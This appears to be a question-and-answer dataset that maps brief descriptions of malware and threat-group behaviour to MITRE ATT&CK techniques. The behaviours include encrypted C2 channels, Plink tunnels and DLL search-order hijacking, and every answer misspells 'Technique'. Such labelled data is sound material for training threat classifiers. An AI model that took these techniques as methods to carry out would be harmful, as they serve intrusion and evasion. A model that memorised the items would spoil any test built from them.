+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SombRAT has encrypted its C2 communications with AES.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrifeWater can encrypt C2 traffic using XOR with a hard coded key.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet encodes the payload of system information sent to the command and control servers using a one byte 0xFF XOR key. Stuxnet also uses a 31-byte long static byte string to XOR data sent to command and control servers. The servers use a different static key to encrypt replies to the implant.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sys10 uses an XOR 0x1 loop to encrypt its C2 domain.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SysUpdate has used DES to encrypt all C2 communications.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TAINTEDSCRIBE uses a Linear Feedback Shift Register (LFSR) algorithm for network encryption.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TSCookie has encrypted network communications with RC4.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Taidoor uses RC4 to encrypt the message body of HTTP content.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Torisma has encrypted its C2 communications using XOR and VEST-32.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot uses a custom crypter leveraging Microsoft’s CryptoAPI to encrypt C2 traffic.Newer versions of TrickBot have been known to use `bcrypt` to encrypt and digitally sign responses to their C2 server.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: UBoatRAT encrypts instructions in its C2 network payloads using a simple XOR cipher.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some versions of UPPERCUT have used the hard-coded string “this is the encrypt key” for Blowfish encryption when communicating with a C2. Later versions have hard-coded keys uniquely for each C2 address.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos can encrypt the data beneath its http2 or tcp encryption at the session layer with CAST-128, using a different key for incoming and outgoing data.","Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volgmer uses a simple XOR cipher to encrypt traffic and files.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WIREFIRE can AES encrypt process output sent from compromised devices to C2.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WarzoneRAT can encrypt its C2 with RC4 with the password `warzone160\x00`.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WellMess can encrypt HTTP POST data using RC6 and a dynamically generated AES key encrypted with a hard coded RSA public key.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Winnti for Linux has used a custom TCP protocol with four-byte XOR for command and control (C2).,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Winnti for Windows can XOR encrypt C2 traffic.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Woody RAT can use AES-CBC to encrypt data sent to its C2 server.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XCSSET uses RC4 encryption over TCP to communicate with its C2 server.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIPLINE can use AES-128-CBC to encrypt data for both upload and download.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZeroT has used RC4 to encrypt C2 traffic.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: down_new has the ability to AES encrypt C2 communications.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: gh0st RAT uses RC4 and XOR to encrypt C2 traffic.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: httpclient encrypts C2 content with XOR using a single byte, 0x12.","Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: metaMain can encrypt the data that it sends and receives from the C2 server using an RC4 encryption algorithm.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: xCaon has encrypted data sent to the C2 server using a XOR key.,"Tecnique: T1573.001 Encrypted Channel: Symmetric Cryptography, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0021, the threat actors used SSL via TCP port 443 for C2 communications.","Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors' proxy implementation ""Agent"" upgraded the socket in use to a TLS socket.","Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group has used the Plink utility to create SSH tunnels.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 used the Plink command-line utility to create SSH tunnels to C2 servers.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 has used the Plink utility to tunnel RDP back to C2 infrastructure.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig used the Plink utility and other tools to create tunnels to C2 servers.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA2541 has used TLS encrypted C2 communications including for campaigns using AsyncRAT.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper has used SSL to connect to C2 servers.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A variant of ADVSTORESHELL encrypts some C2 with RSA.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Attor's Blowfish key is encrypted with a public RSA key.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH can beacon to a hardcoded C2 IP address using TLS encryption every 5 minutes.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BISCUIT uses SSL for encrypting C2 communications.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can use TLS in C2 communications.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CHOPSTICK encrypts C2 communications with TLS.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: COATHANGER connects to command and control infrastructure using SSL.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbon has used RSA encryption for C2 communications.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can use RSA asymmetric encryption with PKCS1 padding to encrypt data sent to the C2 server.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ComRAT can use SSL/TLS encryption for its HTTP-based C2 channel. ComRAT has used public key cryptography with RSA and AES encrypted email attachments for its Gmail C2 channel.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cyclops Blink can encrypt C2 messages with AES-256-CBC sent underneath TLS. OpenSSL library functions are also used to encrypt each message using a randomly generated key and IV, which are then encrypted using a hard-coded RSA public key.","Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman can use TLS to encrypt its C2 channel.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Doki has used the embedTLS library for network communications.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dridex has encrypted traffic with RSA.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet is known to use RSA keys for encrypting C2 traffic.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can use TLS to encrypt its C2 channel.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gazer uses custom encryption for C2 that uses RSA.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldMax has RSA-encrypted its communication with the C2 server.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can use SSL in C2 communication.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GreyEnergy encrypts communications using RSA-2048.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GrimAgent can use a hardcoded server public RSA key to encrypt the first request to C2.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hi-Zor encrypts C2 traffic with TLS.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IcedID has used SSL and TLS in communications with C2.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KEYPLUG can use TLS-encrypted WebSocket Protocol (WSS) for C2.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Koadic can use SSL and TLS for communications.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kobalos's authentication and key exchange is performed using RSA-512.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LITTLELAMB.WOOLTEA can communicate over SSL using the private key from the Ivanti Connect Secure web server.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete has used TLS-encrypted FTP to exfiltrate data.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo's C2 communication has been encrypted using OpenSSL.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mispadu contains a copy of the OpenSSL library to encrypt C2 traffic.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mythic supports SSL encrypted C2.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PITSTOP has the ability to communicate over TLS.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POSHSPY encrypts C2 traffic with AES and RSA.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERSTATS has encrypted C2 traffic with RSA.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pay2Key has used RSA encrypted communications with C2.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Penquin can encrypt communications using the BlowFish algorithm and a symmetric key exchanged with Diffie Hellman.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT used TLS to encrypt command and control (C2) communications.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy's default encryption for its C2 communication channel is SSL, but it also has transport options for RSA and AES.","Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: REvil has encrypted C2 communications with the ECIES algorithm.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rising Sun variants can use SSL for encrypting C2 communications.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sardonic has the ability to send a random 64-byte RC4 key to communicate with actor-controlled C2 servers by using an RSA public key.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ServHelper may set up a reverse SSH tunnel to give the attacker access to services running on the victim, such as RDP.","Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sliver can use mutual TLS and RSA cryptography to exchange a session key.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Small Sieve can use SSL/TLS for its HTTPS Telegram Bot API-based C2 channel.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SodaMaster can use a hardcoded RSA key to encrypt some of its C2 traffic.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SombRAT can SSL encrypt C2 traffic.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrongPity has encrypted C2 traffic using SSL/TLS.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sykipot uses SSL for encrypting C2 communications.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TinyTurla has the ability to encrypt C2 traffic with SSL/TLS.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tor encapsulates traffic in multiple layers of encryption, using TLS by default.","Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Trojan.Karagany can secure C2 communications with SSL and TLS.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos has used a combination of a Diffie-Hellman key exchange mixed with a pre-shared key (PSK) to encrypt its top layer of C2 communications.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some Volgmer variants use SSL to encrypt C2 communications.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WannaCry uses Tor for command and control traffic and routes a custom cryptographic protocol over the Tor circuit.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WellMail can use hard coded client and certificate authority certificates to communicate with C2 over mutual TLS.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WellMess can communicate to C2 with mutual TLS where client and server mutually check certificates.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Woody RAT can use RSA-4096 to encrypt data sent to its C2 server.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XTunnel uses SSL/TLS and RC4 to encrypt traffic.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zebrocy uses SSL and AES ECB for encrypting C2 communications.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: adbupd contains a copy of the OpenSSL library to encrypt C2 traffic.,"Tecnique: T1573.002 Encrypted Channel: Asymmetric Cryptography, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0017, APT41 established persistence by loading malicious libraries via modifications to the Import Address Table (IAT) within legitimate Microsoft binaries.","Tecnique: T1574 Hijack Execution Flow, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: COATHANGER will remove and write malicious shared objects associated with legitimate system functions such as `read(2)`.,"Tecnique: T1574 Hijack Execution Flow, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate edits the Registry key HKCU\Software\Classes\mscfile\shell\open\command to execute a malicious AutoIt script. When eventvwr.exe is executed, this will call the Microsoft Management Console (mmc.exe), which in turn references the modified Registry key.","Tecnique: T1574 Hijack Execution Flow, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Denis replaces the nonexistent Windows DLL ""msfte.dll"" with its own malicious version, which is loaded by the SearchIndexer.exe and SearchProtocolHost.exe.","Tecnique: T1574 Hijack Execution Flow, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: One of Dtrack can replace the normal flow of a program execution with malicious code.,"Tecnique: T1574 Hijack Execution Flow, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRat can hijack the cryptbase.dll within migwiz.exe to escalate privileges and bypass UAC controls.,"Tecnique: T1574 Hijack Execution Flow, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 has used search order hijacking to execute malicious payloads, such as Winnti RAT.","Tecnique: T1574.001 Hijack Execution Flow: DLL Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aquatic Panda has used DLL search-order hijacking to load `exe`, `dll`, and `dat` files into memory.","Tecnique: T1574.001 Hijack Execution Flow: DLL Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BackdoorDiplomacy has executed DLL search order hijacking.,"Tecnique: T1574.001 Hijack Execution Flow: DLL Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cinnamon Tempest has used search order hijacking to launch Cobalt Strike Beacons.,"Tecnique: T1574.001 Hijack Execution Flow: DLL Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Evilnum has used the malware variant, TerraTV, to load a malicious DLL placed in the TeamViewer directory, instead of the original Windows DLL located in a system folder.","Tecnique: T1574.001 Hijack Execution Flow: DLL Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM has used search order hijacking to force TeamViewer to load a malicious DLL.,"Tecnique: T1574.001 Hijack Execution Flow: DLL Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has performed DLL search order hijacking to execute their payload.,"Tecnique: T1574.001 Hijack Execution Flow: DLL Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tonto Team abuses a legitimate and signed Microsoft executable to launch a malicious DLL.,"Tecnique: T1574.001 Hijack Execution Flow: DLL Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Whitefly has used search order hijacking to run the loader Vcrodat.,"Tecnique: T1574.001 Hijack Execution Flow: DLL Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has used DLL search order hijacking.,"Tecnique: T1574.001 Hijack Execution Flow: DLL Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth can launch itself via DLL Search Order Hijacking.,"Tecnique: T1574.001 Hijack Execution Flow: DLL Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BOOSTWRITE has exploited the loading of the legitimate Dwrite.dll file by actually loading the gdi library, which then loads the gdiplus library and ultimately loads the local Dwrite dll.","Tecnique: T1574.001 Hijack Execution Flow: DLL Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brute Ratel C4 has used search order hijacking to load a malicious payload DLL as a dependency to a benign application packaged in the same ISO.,"Tecnique: T1574.001 Hijack Execution Flow: DLL Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chaes has used search order hijacking to load a malicious DLL.,"Tecnique: T1574.001 Hijack Execution Flow: DLL Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crutch can persist via DLL search order hijacking on Google Chrome, Mozilla Firefox, or Microsoft OneDrive.","Tecnique: T1574.001 Hijack Execution Flow: DLL Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Downdelph uses search order hijacking of the Windows executable sysprep.exe to escalate privileges.,"Tecnique: T1574.001 Hijack Execution Flow: DLL Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire contains modules that can discover and exploit various DLL hijacking opportunities.,"Tecnique: T1574.001 Hijack Execution Flow: DLL Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A FinFisher variant uses DLL search order hijacking.,"Tecnique: T1574.001 Hijack Execution Flow: DLL Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FoggyWeb's loader has used DLL Search Order Hijacking to load malicious code instead of the legitimate `version.dll` during the `Microsoft.IdentityServer.ServiceHost.exe` execution process.,"Tecnique: T1574.001 Hijack Execution Flow: DLL Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HTTPBrowser abuses the Windows DLL load order by using a legitimate Symantec anti-virus binary, VPDN_LU.exe, to load a malicious DLL that mimics a legitimate Symantec DLL, navlu.dll.","Tecnique: T1574.001 Hijack Execution Flow: DLL Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
